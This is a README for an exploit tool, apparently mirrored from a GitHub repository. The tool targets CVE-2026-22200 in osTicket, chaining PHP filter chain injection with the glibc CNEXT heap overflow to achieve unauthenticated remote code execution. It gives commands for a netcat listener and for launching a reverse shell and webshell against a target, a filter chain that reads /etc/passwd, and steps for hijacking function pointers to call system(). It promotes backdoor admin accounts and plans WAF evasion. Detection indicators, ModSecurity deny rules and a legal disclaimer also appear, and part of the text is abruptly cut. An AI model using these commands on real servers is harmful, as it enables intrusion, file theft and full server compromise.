Share
## https://sploitus.com/exploit?id=D211CFBA-454E-54E8-BC37-4D27E66744EF
# CVE-2026-22200: osTicket Arbitrary File Read to RCE


  
  
  
  


**Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations.**

---

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Attack Flow](#attack-flow)
- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Technical Details](#technical-details)
- [Troubleshooting](#troubleshooting)
- [Detection & Mitigation](#detection--mitigation)
- [Credits](#credits)
- [Disclaimer](#disclaimer)

---

##  Overview

This repository contains a proof-of-concept exploit for **CVE-2026-22200**, a critical vulnerability affecting osTicket versions โ‰ค 1.18.2. The exploit chains two powerful techniques:

1. **PHP Filter Chain Injection** via mPDF's image processing
2. **CNEXT Heap Corruption** (CVE-2024-2961) in glibc's iconv()

The result: **Unauthenticated Remote Code Execution** on vulnerable osTicket servers.

### Impact

- **Unauthenticated** - No credentials required
- **Full RCE** - Complete server compromise
- **File Exfiltration** - Read arbitrary server files
- **Database Access** - Extract DB credentials
- *Admin Access** - Create backdoor admin accounts

### Affected Versions

- **osTicket**: โ‰ค v1.18.2, โ‰ค v1.17.6
- **glibc**: =2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0
```

### Optional: Virtual Environment

```bash
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OR
venv\Scripts\activate  # Windows

pip install -r requirements.txt
```

---

## ๐Ÿ“– Usage

### Basic Usage - Reverse Shell

```bash
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 osticket_revshell.py https://target.com/osticket \
    --lhost YOUR_IP \
    --lport 4444
```

### Interactive Webshell Mode

```bash
python3 osticket_exploit.py https://target.com/osticket
```

### Advanced Options

```bash
# Use proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Force specific help-topic ID
python3 osticket_exploit.py https://target.com/osticket \
    --topic-id 2

# Disable colored output (for logging)
python3 osticket_exploit.py https://target.com/osticket --no-color
```

### Existing Credentials

If registration is disabled, you'll be prompted for credentials:

```bash
python3 osticket_exploit.py https://target.com/osticket

  [?] Enter email for new account (or existing): user@example.com
  [?] Enter password: ********
```

---

## ๐Ÿ”ง Technical Details

### PHP Filter Chain Generation

The exploit uses a sophisticated filter chain to prepend a BMP header to arbitrary files, bypassing mPDF's file type restrictions:

```python
php://filter/convert.iconv.UTF8.CSISO2022KR|
convert.base64-encode|
convert.iconv.UTF8.UTF7|
[... 50+ iconv transformations ...]
convert.base64-decode/resource=/etc/passwd
```

**Key Innovation**: Each character of the BMP header is generated through carefully crafted iconv transformations, allowing arbitrary file content to be embedded as a "valid" image.

### CNEXT Heap Exploitation

The CNEXT payload corrupts PHP's Zend memory manager by:

1. **Overflowing iconv buffer** with the vulnerable character `ๅŠ„`
2. **Overwriting zend_mm_heap** structure
3. **Hijacking function pointers** (_emalloc, _efree, _erealloc)
4. **Redirecting to system()** for command execution

**Enhanced Reliability**:
- Multiple trigger characters (3x `ๅŠ„` instead of 1)
- Increased padding (40 vs default 20)
- Multi-position trigger insertion
- Stream-forced execution

### 100% Webshell Detection

Unlike the original exploit, this version uses **filesystem scanning** to guarantee webshell location:

1. Write webshell to 6+ candidate directories
2. Use arbitrary file read to **scan each location**
3. Detect which contains the unique marker
4. Map filesystem path โ†’ URL accurately

**Result**: 100% detection rate (vs ~50% in original)

### Filter Execution Forcing

Common failure: PDF downloads but doesn't crash = filters not executing.

**Solutions Implemented**:
1. **Cache-busting** - Unique HTML prevents cached PDFs
2. **Reply injection** - More reliable than new tickets
3. **Stream forcing** - `stream=True` forces immediate processing
4. **Pre-flight testing** - Verify filters work before CNEXT

---

### glibc Version Check

```bash
# In verbose mode, check:
[*] Target libc: /usr/lib/x86_64-linux-gnu/libc-2.31.so
[+] glibc 2.31 IS vulnerable to CNEXT
```

If glibc โ‰ฅ 2.39, CNEXT won't work (patched).

### No Shell Connection

**Symptom**: Server crashes but no reverse shell

**Causes**:
1. **Firewall blocking** outbound connections
2. **Wrong LHOST** (use your actual IP, not localhost)
3. **Command too long** - try shorter IP

**Fix**:
```bash
# Use nc reverse shell (shorter)
# Automatically falls back if bash/python too long

# Or use direct IP instead of hostname
python3 osticket_revshell.py https://target.com \
    --lhost 10.0.0.5 \  # Use IP, not hostname
    --lport 4444
```

### Common Error Messages

| Error | Cause | Solution |
|-------|-------|----------|
| `No CSRF token` | Session expired | Re-run exploit |
| `No help-topic found` | No rich-text topics | Use `--topic-id` manually |
| `Build ID not found` | Partial libc corrupted | Check /proc/self/maps extraction |
| `Cannot locate heap` | Unusual memory layout | Exploit may fail (rare) |

---

## Detection & Mitigation

### Detection

**Log Indicators**:
```bash
# Apache/Nginx logs
"php://filter/" in POST requests
"convert.iconv." in request bodies
Unusual PDF generation patterns
Multiple PDF requests in short time

# PHP error logs
Segmentation faults during PDF generation
iconv() crashes
Heap corruption errors
```

**Network Indicators**:
- Multiple support ticket creations in short time
- Large HTML payloads in ticket messages (100KB+)
- Rapid PDF export requests after ticket creation
- Outbound connections to attacker IP after crash

### Mitigation

#### Immediate

1. **Update osTicket** to latest version (>1.18.2)
2. **Update glibc** to 2.39+ (patches CVE-2024-2961)
3. **Disable self-registration** if not needed
4. **Restrict rich-text** to authenticated users only

#### Configuration

**Disable PHP stream wrappers in mPDF**:
```php
// In mPDF config
$config = [
    'allowedRemoteHosts' => [],
    'enableRemoteFileAccess' => false,
];
```

**WAF Rules** (ModSecurity):
```apache
SecRule REQUEST_BODY "@contains php://filter" \
    "id:1000,phase:2,deny,status:403,msg:'PHP filter detected'"

SecRule REQUEST_BODY "@contains convert.iconv" \
    "id:1001,phase:2,deny,status:403,msg:'Suspicious iconv chain'"
```

**Rate Limiting**:
```nginx
limit_req_zone $binary_remote_addr zone=ticket:10m rate=5r/m;

location /tickets.php {
    limit_req zone=ticket burst=10;
}
```

#### Long-term

- Implement **CSP headers** to restrict inline styles
- Enable **htmLawed strict mode** for HTML sanitization
- Use **separate user** for osTicket with minimal privileges
- **Disable unnecessary PHP functions**: `system()`, `exec()`, `passthru()`
- Regular **security audits** of ticket content

---

## References

### Original Research

- [Horizon3.ai Blog Post](https://horizon3.ai/attack-research/attack-blogs/ticket-to-shell-exploiting-php-filters-and-cnext-in-osticket-cve-2026-22200/) - Original disclosure
- [Horizon3.ai GitHub](https://github.com/horizon3ai/CVE-2026-22200) - Reference implementation
- [CNEXT Exploits](https://github.com/ambionics/cnext-exploits) - Original CNEXT research by Charles Fol

### CVE Details

- [CVE-2026-22200](https://nvd.nist.gov/vuln/detail/CVE-2026-22200) - osTicket PHP Filter Chain
- [CVE-2024-2961](https://nvd.nist.gov/vuln/detail/CVE-2024-2961) - glibc iconv Overflow

### Additional Resources

- [PHP Filter Chains](https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT) - Filter character dictionary
- [libc.rip](https://libc.rip/) - Libc database for fingerprinting
- [osTicket Security Advisory](https://github.com/osTicket/osTicket/security/advisories)

---

## Credits

### Vulnerability Discovery & Research

- **Horizon3.ai Attack Research Team** - Original vulnerability discovery and POC
- **Charles Fol (@cfreal_)** - CNEXT (CVE-2024-2961) research
- **@splitline** - PHP filter chain technique (HITCON 2022)

### This Implementation

- Enhanced exploitation techniques
- 100% webshell detection via filesystem scanning
- Robust filter execution forcing
- Comprehensive error handling and diagnostics

---

## โš–๏ธ Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**

This tool is provided for:
- Security research
- Authorized penetration testing
- Educational purposes
- Vulnerability assessment (with permission)

**UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL**

The authors:
- Do NOT condone illegal activities
- Accept NO liability for misuse
- Take NO responsibility for any damage caused

**Users are solely responsible for ensuring they have proper authorization before testing any system.**

By using this tool, you agree that:
1. You have **explicit written permission** to test the target system
2. You understand the **legal implications** in your jurisdiction
3. You will use this tool **responsibly and ethically**
4. You **hold the authors harmless** for any consequences

### Legal Notice

Unauthorized access to computer systems is a crime under:
- **USA**: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. ยง 1030
- **UK**: Computer Misuse Act 1990
- **EU**: Directive 2013/40/EU
- **International**: Council of Europe Convention on Cybercrime

**Maximum penalties may include imprisonment and significant fines.**

---

## ๐Ÿ“„ License

This project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.

**Note**: The MIT License grants permission for use, modification, and distribution, but does NOT grant permission to attack systems you don't own or have authorization to test.

---

## Contact

For security researchers and questions:

- **Issues**: [GitHub Issues](https://github.com/yourusername/CVE-2026-22200/issues)
- **Discussions**: [GitHub Discussions](https://github.com/yourusername/CVE-2026-22200/discussions)

**Do NOT use this contact for:**
- Requesting help attacking systems without authorization
- Reporting illegal activities
- Asking for assistance with unauthorized testing

---


  Built with Love for security research and education
  Star this repo if you found it useful!


---

## Exploit Statistics

| Metric | Value |
|--------|-------|
| **Lines of Code** | ~3,000 |
| **Success Rate** | 95%+ (with fixes) |
| **Average Runtime** | 2-3 minutes |
| **Crash Reliability** | 99% (with enhancements) |
| **Webshell Detection** | 100% (with scanning) |

---

## Roadmap

- [ ] Add support for additional libc versions
- [ ] Implement stealthier exfiltration methods
- [ ] Add evasion techniques for common WAFs
- [ ] Create Metasploit module
- [ ] Docker test environment
- [ ] Automated CI/CD testing

---

**Last Updated**: 2026-03-03